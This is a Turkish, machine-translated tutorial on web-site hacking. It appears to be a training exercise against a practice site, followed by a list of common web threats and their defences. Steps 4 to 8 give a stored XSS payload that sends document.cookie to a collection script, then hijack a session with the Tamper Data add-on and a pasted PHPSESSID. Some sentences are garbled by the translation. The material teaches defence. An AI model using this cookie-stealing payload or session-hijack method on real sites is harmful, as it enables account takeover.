Bir Web Sitesi Nasıl Hacklenir? Yaygın Site Hackleme Teknikleri

Web Sitesi Hackleme Teknikleri

Her zamankinden daha fazla insan internete erişebiliyor. Bu durum birçok kuruluşu, kullanıcıların kuruluşla etkileşimde bulunmak için çevrimiçi olarak kullanabilecekleri web tabanlı uygulamalar geliştirmeye yöneltmiştir. Web uygulamaları için kötü yazılmış kodlar, hassas verilere ve web sunucularına yetkisiz erişim sağlamak için kullanılabilir.

Bu eğitimde web sitelerini nasıl hackleyeceğinizi öğreneceksiniz ve size şunları tanıtacağız: web uygulaması hackleme teknikleri ve karşı önlemler Bu tür saldırılara karşı korunmak için devreye alabilirsiniz.

Bir Web Sitesi Nasıl Hacklenir?

Bu web sitesi hackleme pratik senaryosunda, adresinde bulunan web uygulamasının kullanıcı oturumunu ele geçireceğiz. www.techpanda.org. Çerez oturum kimliğini okumak için siteler arası komut dosyası kullanacağız ve ardından bunu meşru bir kullanıcı oturumunu taklit etmek için kullanacağız.

Yapılan varsayım, saldırganın web uygulamasına erişimi olduğu ve aynı uygulamayı kullanan diğer kullanıcıların oturumlarını ele geçirmek istediği yönündedir. Bu saldırının amacı, saldırganın erişim hesabının sınırlı olduğu varsayılarak web uygulamasına yönetici erişimi sağlamak olabilir.

) 1 Adım URL'yi aç http://www.techpanda.org/.

Alıştırma amacıyla, SQL Injection kullanarak erişim elde etmeniz önemle tavsiye edilir. Buna bakın göre bunun nasıl yapılacağı hakkında daha fazla bilgi için.

) 2 Adım Giriş Bilgilerinizi Girin.

Giriş e-postası admin@google.com, şifre Şifre2010'dur.

) 3 Adım Kontrol panelini kontrol edin.

Başarıyla giriş yaptıysanız, aşağıdaki panoyu göreceksiniz

) 4 Adım Yeni İçerik Girin.

Yeni Kişi Ekle'ye tıklayın ve aşağıdakini ad olarak girin

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

) 5 Adım Ekle Javascript.

Yukarıdaki kod kullanır JavaSenaryo. Onclick etkinliğine sahip bir köprü ekler. Şüphelenmeyen kullanıcı bağlantıyı tıkladığında etkinlik, PHP çerez oturum kimliği ve bunu snatch_sess_id.php URL'deki oturum kimliğiyle birlikte sayfa

) 6 Adım Detayları Ekle.

Aşağıda gösterildiği gibi kalan ayrıntıları girin ve Değişiklikleri Kaydet'e tıklayın

) 7 Adım Kontrol panelini kontrol edin.

Gösterge paneliniz artık aşağıdaki ekran gibi görünecek

) 8 Adım Oturum kimliğini kontrol edin.

Siteler arası komut dosyası kodu veritabanında saklandığından, erişim haklarına sahip kullanıcılar her oturum açtığında yüklenecektir.

Yöneticinin oturum açtığını ve Dark yazan köprüye tıkladığını varsayalım.

URL'de gösterilen oturum kimliğinin bulunduğu pencereyi alacaktır

not: betik, değeri PHPSESSID'nin saklandığı uzak bir sunucuya gönderiyor olabilir ve ardından kullanıcı hiçbir şey olmamış gibi web sitesine geri yönlendirilir.

not: Aldığınız değer bu web sayfasındaki değerden farklı olabilir bilgisayar korsanlığı eğitimiama konsept aynı

Oturum Kimliğine Bürünme kullanımı Firefox ve Sabotaj Verileri eklentisi

Aşağıdaki akış şeması bu alıştırmayı tamamlamak için atmanız gereken adımları göstermektedir.

• Siz ihtiyacınız olacaktır Firefox bu bölüm için web tarayıcısı ve Dış Müdahale Verileri eklentisi
• Açılış Firefox ve aşağıdaki şemalarda gösterildiği gibi eklentiyi yükleyin

• Kurcalama verilerini arayın ve ardından yukarıda gösterildiği gibi kuruluma tıklayın

• Kabul Et ve Yükle'ye tıklayın…

• Kurulum tamamlandığında Şimdi yeniden başlat'a tıklayın
• Menü çubuğunu etkinleştirin Firefox eğer gösterilmiyorsa

• Araçlar menüsüne tıklayın ve aşağıda gösterildiği gibi Dış Müdahale Verilerini seçin

• Aşağıdaki Pencereyi göreceksiniz. Not: Eğer Windows boş değil, temizle düğmesine basın

• Sabotajı Başlat menüsüne tıklayın
• geri dön Firefox web tarayıcısı, yazın http://www.techpanda.org/dashboard.php ardından sayfayı yüklemek için enter tuşuna basın
• Tamper Data'dan aşağıdaki açılır pencereyi alacaksınız

• Açılır pencerede üç (3) seçenek bulunur. Sabotaj seçeneği, HTTP başlık bilgilerini sunucuya gönderilmeden önce değiştirmenize olanak tanır..
• Üzerine tıklayın
• Aşağıdaki pencereyi göreceksiniz

• Kopya PHP oturum kimliği saldırı URL'sinden kopyalayıp eşittir işaretinin sonrasına yapıştırdınız. Değeriniz şimdi şöyle görünmeli

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• Tamam düğmesine tıklayın
• Sabotaj verileri açılır penceresini tekrar göreceksiniz

• Devamlı Kurcalamaya Devam Et? onay kutusunun işaretini kaldırın.
• İşiniz bittiğinde gönder düğmesine tıklayın
• Kontrol panelini aşağıda gösterildiği gibi görebilmeniz gerekir.

not: giriş yapmadık, siteler arası komut dosyası çalıştırmayı kullanarak aldığımız PHPSESSID değerini kullanarak bir giriş oturumunun kimliğine büründük

Web Uygulaması Nedir? Web Tehditleri nedir?

Bir web uygulaması (diğer adıyla web sitesi), istemci-sunucu modeline dayalı bir uygulamadır. sunucu veritabanı erişimini ve iş mantığını sağlar. Bir web sunucusunda barındırılmaktadır. İstemci uygulaması istemci web tarayıcısında çalışır. Web uygulamaları genellikle aşağıdaki gibi dillerde yazılır: Java, C# ve VB.Net, PHP, ColdFusion Markup Language vb. web uygulamalarında kullanılan veritabanı motorları şunları içerir: MySQL, MS SQL Sunucusu, PostgreSQL, SQLite, vb.

En İyi Web Sitesi Hackleme Teknikleri

Çoğu web uygulaması, İnternet üzerinden erişilebilen genel sunucularda barındırılır. Bu, kolay erişilebilirlik nedeniyle saldırılara karşı savunmasız hale getirir. Aşağıdakiler yaygın web uygulaması tehditleridir.

• SQL Injection – Bu tehdidin amacı oturum açma algoritmalarını atlamak, verileri sabote etmek vb. olabilir.
• Hizmet Reddi Saldırıları– bu tehdidin amacı meşru kullanıcıların kaynağa erişimini engellemek olabilir
• Siteler Arası Komut Dosyası Çalıştırma XSS– Bu tehdidin amacı, istemci tarafındaki tarayıcıda yürütülebilecek kodu enjekte etmek olabilir.
• Çerez/Oturum Zehirlenmesi– Bu tehdidin amacı, bir saldırganın yetkisiz erişim elde etmek amacıyla çerezleri/oturum verilerini değiştirmektir.
• Formda Değişiklik Yapmak – Bu tehdidin amacı e-ticaret uygulamalarındaki fiyatlar gibi form verilerini değiştirerek saldırganın ürünleri indirimli fiyatlarla alabilmesini sağlamaktır.
• Kod Enjeksiyonu – Bu tehdidin amacı PHP gibi kodlar enjekte etmektir, Pythonvb. sunucuda yürütülebilir. Kod, arka kapılar kurabilir, hassas bilgileri ortaya çıkarabilir vb.
• kazıntı– Bu tehdidin amacı, bir web sitesinde görüntülenen sayfayı değiştirmek ve tüm sayfa isteklerini, saldırganın mesajını içeren tek bir sayfaya yönlendirmektir.

Web Sitenizi Saldırılara Karşı Nasıl Korursunuz?

Bir kuruluş web sunucusu saldırılarına karşı kendini korumak için aşağıdaki politikayı benimseyebilir.

• SQL Injection – Kullanıcı parametrelerinin işlenmek üzere veritabanına gönderilmeden önce temizlenmesi ve doğrulanması, saldırı olasılığının azaltılmasına yardımcı olabilir. SQL Injection. MS SQL Server gibi veritabanı motorları, MySQLvb. destek parametreleri ve hazırlanan ifadeler. Geleneksel SQL ifadelerinden çok daha güvenlidirler
• Hizmet Reddi Saldırıları – Saldırı basit bir DoS ise, şüpheli IP adresinden gelen trafiği kesmek için güvenlik duvarları kullanılabilir. Ağların ve İzinsiz Giriş Tespit Sisteminin doğru şekilde yapılandırılması, saldırı olasılığının azaltılmasına da yardımcı olabilir. DoS saldırısı başarılı oldu.
• Siteler Arası Komut Dosyası Çalıştırma – Başlıkların, URL yoluyla iletilen parametrelerin, form parametrelerinin ve gizli değerlerin doğrulanması ve temizlenmesi, XSS saldırılarının azaltılmasına yardımcı olabilir.
• Çerez/Oturum Zehirlenmesi – bu, çerezlerin içeriğinin şifrelenmesi, çerezlerin bir süre sonra zaman aşımına uğratılması, çerezlerin, onları oluşturmak için kullanılan istemci IP adresiyle ilişkilendirilmesiyle önlenebilir.
• Form temperleme – bu, kullanıcı girişinin işlenmeden önce doğrulanması ve doğrulanmasıyla önlenebilir.
• Kod Enjeksiyonu – bu, tüm parametrelerin yürütülebilir kod yerine veri olarak ele alınmasıyla önlenebilir. Bunu uygulamak için Temizleme ve Doğrulama kullanılabilir.
• tahrifat – İyi bir web uygulaması geliştirme güvenlik politikası, Web sunucusuna erişimde yaygın olarak kullanılan güvenlik açıkları. Bu, web uygulamaları geliştirirken işletim sisteminin, web sunucusu yazılımının ve en iyi güvenlik uygulamalarının uygun şekilde yapılandırılması olabilir.

Şuna göz at: Bağlantının Kötü Amaçlı Yazılımlara Karşı Güvenli olup olmadığını Kontrol Etmek için En İyi 9 URL Tarayıcı

ÖZET

• Bir web uygulaması sunucu-istemci modeline dayanmaktadır. İstemci tarafı, sunucudaki kaynaklara erişmek için web tarayıcısını kullanır.
• Web uygulamalarına genellikle internet üzerinden erişilebilir. Bu da onları saldırılara karşı savunmasız hale getiriyor.
• Web uygulaması tehditleri arasında SQL Enjeksiyonu, Kod Enjeksiyonu, XSS, Defacement, Çerez zehirlenmesi vb. yer alır.
• Web uygulamaları geliştirirken iyi bir güvenlik politikası, bunların güvenli olmasına yardımcı olabilir.